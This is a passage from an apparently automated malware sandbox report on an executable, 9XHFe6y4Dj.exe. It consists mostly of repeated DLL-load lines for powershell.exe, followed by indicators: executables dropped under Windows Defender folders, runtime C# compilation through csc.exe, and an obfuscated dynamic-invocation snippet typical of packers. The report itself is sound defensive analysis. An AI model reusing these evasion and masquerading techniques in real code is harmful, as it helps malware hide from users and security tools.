                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32Jump to behavior
                            Source: Window RecorderWindow detected: More than 3 window changes detected
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeDirectory created: C:\Program Files\Windows Defender\Platform\tqeRXJHxPWPPoiNqjJeEYdv.exeJump to behavior
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeDirectory created: C:\Program Files\Windows Defender\Platform\bd46efcfcb9cccJump to behavior
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeDirectory created: C:\Program Files\Uninstall Information\tqeRXJHxPWPPoiNqjJeEYdv.exeJump to behavior
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeDirectory created: C:\Program Files\Uninstall Information\bd46efcfcb9cccJump to behavior
                            Source: 9XHFe6y4Dj.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                            Source: 9XHFe6y4Dj.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
                            Source: 9XHFe6y4Dj.exeStatic file information: File size 16272384 > 1048576
                            Source: 9XHFe6y4Dj.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x387400
                            Source: 9XHFe6y4Dj.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                            Source: Binary string: 8C:\Users\user\AppData\Local\Temp\hbljmznv\hbljmznv.pdb source: 9XHFe6y4Dj.exe, 00000000.00000002.2210751988.000000000351C000.00000004.00000800.00020000.00000000.sdmp
                            Source: Binary string: 8C:\Users\user\AppData\Local\Temp\tmiybkuk\tmiybkuk.pdb source: 9XHFe6y4Dj.exe, 00000000.00000002.2210751988.000000000351C000.00000004.00000800.00020000.00000000.sdmp

                            Data Obfuscation

                            barindex
                            .NET source code contains method to dynamically call methods (often used by packers)
                            Source: 9XHFe6y4Dj.exe, PxYyBN7eGEjABOahheG.cs.Net Code: Type.GetTypeFromHandle(h15SPJ4uyJthUNbUclf.PycNoTjvZ4m(16777424)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(h15SPJ4uyJthUNbUclf.PycNoTjvZ4m(16777245)),Type.GetTypeFromHandle(h15SPJ4uyJthUNbUclf.PycNoTjvZ4m(16777259))})
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\tmiybkuk\tmiybkuk.cmdline"
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\hbljmznv\hbljmznv.cmdline"
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\tmiybkuk\tmiybkuk.cmdline"Jump to behavior
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\hbljmznv\hbljmznv.cmdline"Jump to behavior
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeCode function: 0_2_00007FF848BF627E pushfd ; ret 0_2_00007FF848BF6281
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeCode function: 0_2_00007FF848BF263D push ds; iretd 0_2_00007FF848BF2641
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeCode function: 0_2_00007FF848BF47B8 push edi; iretd 0_2_00007FF848BF47BE
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeCode function: 0_2_00007FF848BF7B02 push edi; retn 5F4Ch0_2_00007FF848BF7B36
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeCode function: 0_2_00007FF848BF00BD pushad ; iretd 0_2_00007FF848BF00C1
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeCode function: 0_2_00007FF848BF47FC push ss; iretd 0_2_00007FF848BF47FF
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeCode function: 0_2_00007FF848D533A1 push eax; iretd 0_2_00007FF848D533A4
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeCode function: 0_2_00007FF848D50BB6 pushad ; iretd 0_2_00007FF848D50BB9
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeCode function: 0_2_00007FF848D530E4 push ecx; ret 0_2_00007FF848D530E5
